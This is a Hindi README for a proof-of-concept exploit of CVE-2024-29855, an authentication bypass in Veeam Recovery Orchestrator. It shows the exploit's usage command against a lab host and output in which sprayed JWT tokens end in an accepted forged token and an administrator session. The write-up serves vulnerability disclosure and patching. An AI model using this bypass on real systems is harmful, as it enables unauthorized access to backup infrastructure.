
Veeam Recovery Orchestrator प्रमाणीकरण CVE-2024-29855 के लिए PoC
Veeam Recovery Orchestrator प्रमाणीकरण बायपास (CVE-2024-29855) — SummoningTeam (@SummoningTeam) के Sina Kheirkhah (@SinSinology) द्वारा
इस भेद्यता का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है

Veeam ने Veeam Recovery Orchestrator को प्रभावित करने वाली प्रमाणीकरण बायपास भेद्यता CVE-2024-29855 के लिए एक CVSS 9 एडवाइज़री प्रकाशित की है। इस मुद्दे का मेरा पूर्ण विश्लेषण और एक्सप्लॉइट निम्नलिखित है। हालाँकि यह मुद्दा उतना गंभीर नहीं है जितना यह सुनने में लग सकता है (बिल्कुल घबराएँ नहीं), लेकिन मुझे इस भेद्यता की कार्यप्रणाली कुछ दिलचस्प लगी और मैंने इसका विस्तृत विश्लेषण और एक्सप्लॉइट प्रकाशित करने का निर्णय लिया।
Veeam की आधिकारिक एडवाइज़री के अनुसार, चर्चित भेद्यता को इन संस्करणों से हल कर दिया गया था:
Veeam Recovery Orchestrator 7.1.0.230 Veeam Recovery Orchestrator 7.0.0.379
python CVE-2024-29855.py --start_time 1718264404 --end_time 1718264652 --username [email protected] --target https://192.168.253.180:9898/
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(+) Pwned Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.gpvNsv78cZRt6qelKMIzprAQG_Eva6pKyNLLGIrnXkA, Status code: 200
(+) Response: {"user":"[email protected]","siteName":null,"siteRole":"Unknown","isLogged":true,"formats":{"shortTime":"H:i","longTime":"H:i:s","shortDate":"m/d/Y","shortTimeHR":"HH:mm","longTimeHR":"HH:mm:ss","shortDateHR":"MM/dd/yyyy","firstDayOfWeek":"Sunday"},"roles":["SiteSetupOperator"],"siteScopeRoles":[{"id":"00000000-0000-0000-0000-000000000000","name":"All Scopes","roles":[]}],"displayUserName":"EVILCORP\\Administrator","uiTimeout":3600,"dnsName":"WIN-I61UGP29579.evilcorp.local","domainName":"evilcorp.local"}
नवीनतम संस्करण में अपडेट करें या Veeam एडवाइज़री में दिए गए निर्देशों का पालन करके शमन करें।
यह सॉफ्टवेयर विशुद्ध रूप से शैक्षणिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्यों के लिए बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। प्रोजेक्ट अनुरक्षक सॉफ्टवेयर के दुरुपयोग के लिए जिम्मेदार या उत्तरदायी नहीं हैं। जिम्मेदारी से उपयोग करें।